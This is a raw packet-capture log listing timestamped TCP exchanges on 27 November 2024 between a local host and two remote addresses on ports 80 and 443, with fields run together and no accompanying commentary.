                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.073581934 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.073626041 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.073786974 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.073832989 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.074558020 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.074605942 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.074613094 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.074651957 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.075493097 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.075540066 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.075598001 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.075647116 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.076469898 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.076522112 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.076558113 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.076611996 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.077413082 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.077462912 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.077466011 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.077507019 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.078377008 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.078423977 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.078515053 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.078560114 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.079359055 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.079411983 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.079454899 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.079503059 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.080255985 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.080301046 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.108736992 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.108791113 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.108845949 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.108892918 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.109200001 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.109249115 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.109287977 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.109332085 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.110157967 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.110204935 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.110239983 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.110284090 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.111094952 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.111139059 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.188945055 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189001083 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189121008 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189168930 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189421892 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189466953 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189548969 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.189588070 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.190382004 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.190426111 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.190479994 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.190531015 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.191308975 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.191358089 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.191466093 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.191510916 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.192275047 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.192322969 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.192416906 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.192470074 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.193274021 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.193321943 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.193389893 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.193437099 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.194209099 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.194257021 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.194288015 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.194334030 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.195158958 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.195213079 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.195250034 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.195295095 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.196161032 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.196209908 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.196244001 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.196294069 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.197088003 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.197137117 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.197171926 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.197216988 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.198038101 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.198090076 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.198105097 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.198148012 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.199012995 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.199064016 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.199101925 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.199148893 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.199959993 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.200009108 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.200045109 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.200095892 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.200907946 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.200958967 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.201004028 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.201050043 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.201916933 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.201966047 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.201991081 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.202039003 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.202862024 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.202918053 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.202938080 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.202986002 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.203804970 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.203855038 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.203902960 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.203950882 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.204747915 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.204797029 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.204875946 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.204925060 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.205717087 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.205769062 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.205805063 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.205852032 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.206773996 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.206824064 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.206875086 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.206922054 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.207640886 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.207693100 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.207734108 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.207781076 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.208585024 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.208633900 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.208677053 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.208724976 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.209553957 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.209603071 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.209633112 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.209675074 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.210517883 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.210566044 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.210609913 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.210656881 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.211484909 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.211535931 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.211579084 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.211627007 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.212450027 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.212501049 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.212544918 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.212593079 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.213442087 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.213455915 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.213496923 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269433975 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269506931 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269534111 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269575119 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269886017 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.269952059 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270035982 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270083904 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270838022 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270919085 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270955086 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.270999908 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.271796942 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.271831989 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.271891117 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.271936893 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.272793055 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.272855997 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.272891045 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.272941113 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.273718119 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.273777008 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.273850918 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.273900032 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.274698973 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.274755001 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.274796009 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.274844885 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.275639057 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.275691032 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.275784016 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.275832891 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.276566982 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.276613951 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.276684046 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.276751995 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.277539968 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.277592897 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.277637959 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.277687073 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.278493881 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.278538942 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.278650999 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.278702974 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.279473066 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.279531956 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.279686928 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.279736996 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.280458927 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.280543089 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.280587912 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.280638933 CET4970680192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.435148001 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.436136007 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.436147928 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.436752081 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.436757088 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.608971119 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.609555960 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.609698057 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.609721899 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.609874964 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.609905958 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.610297918 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.610305071 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.610336065 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.610348940 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.643131971 CET4434971713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.643778086 CET49717443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.643793106 CET4434971713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.644139051 CET49717443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.644146919 CET4434971713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.674722910 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.675801992 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.675813913 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.676233053 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.676238060 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.869952917 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.870028019 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.870083094 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.933784008 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.933803082 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.933835983 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:20.933842897 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.052694082 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.052766085 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.052862883 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.053250074 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.053325891 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.053369045 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075254917 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075275898 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075383902 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075575113 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075587988 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075597048 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.075601101 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.076196909 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.076219082 CET4434971413.107.246.63192.168.2.7
